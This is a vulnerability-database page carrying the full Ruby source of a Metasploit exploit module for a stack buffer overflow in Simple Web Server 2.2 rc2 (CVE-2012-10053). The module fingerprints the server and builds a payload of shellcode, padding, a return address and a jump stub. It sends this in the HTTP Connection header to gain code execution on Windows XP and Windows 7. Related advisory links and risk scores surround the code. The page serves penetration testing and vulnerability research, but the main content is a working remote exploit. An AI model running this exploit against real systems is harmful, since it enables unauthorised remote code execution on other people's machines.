Lucene search
+L

Simple Web Server Connection Header Buffer Overflow

🗓️ 20 Jul 2012 00:00:00Reported by mr.pr0n, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Simple Web Server Connection Header Buffer Overflow exploit for Window

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-10053
29 May 201815:50
circl
cnnvd
CNNVD
PMSoftware Simple Web Server 安全漏洞
8 Aug 202500:00
cnnvd
cve
CVE
CVE-2012-10053
8 Aug 202518:12
cve
cvelist
Cvelist
CVE-2012-10053 Simple Web Server Connection Header Buffer Overflow
8 Aug 202518:12
cvelist
euvd
EUVD
EUVD-2012-6582
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-10053
8 Aug 202519:15
nvd
openvas
OpenVAS
Simple Web Server Connection Header Buffer Overflow Vulnerability
23 Jul 201200:00
openvas
ptsecurity
Positive Technologies
PT-2025-32406 · Unknown · Simple Web Server
8 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2012-10053
10 Aug 202518:14
redhatcve
vulnrichment
Vulnrichment
CVE-2012-10053 Simple Web Server Connection Header Buffer Overflow
8 Aug 202518:12
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Simple Web Server Connection Header Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
          can send a long string data in the Connection Header to causes an overflow on the
          stack when function vsprintf() is used, and gain arbitrary code execution. The
          module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
        },
        'License'	=> MSF_LICENSE,
        'Author' => [
          'mr.pr0n', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2012-10053'],
          ['OSVDB', '84310'],
          ['EDB', '19937'],
          ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
        ],
        'Payload' => {
          'BadChars' => "\x00\x0a\x0d",
          'Space' => 2048,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process",
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
              'Offset' => 2048,
              'OffsetEDI' => 84
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-07-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    res = send_request_raw({ 'uri' => '/' })
    if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
      return Exploit::CheckCode::Appears('Target appears to be vulnerable')
    end

    return Exploit::CheckCode::Safe('Target is not vulnerable')
  end

  def exploit
    sploit = payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << [target.ret].pack("V") # eip
    sploit << rand_text(target['OffsetEDI'])
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

    print_status("Trying target #{target.name}...")

    connect

    send_request_cgi({
      'uri' => '/',
      'version' => '1.1',
      'method' => 'GET',
      'connection' => sploit
    })

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
EPSS0.01205
SSVC
27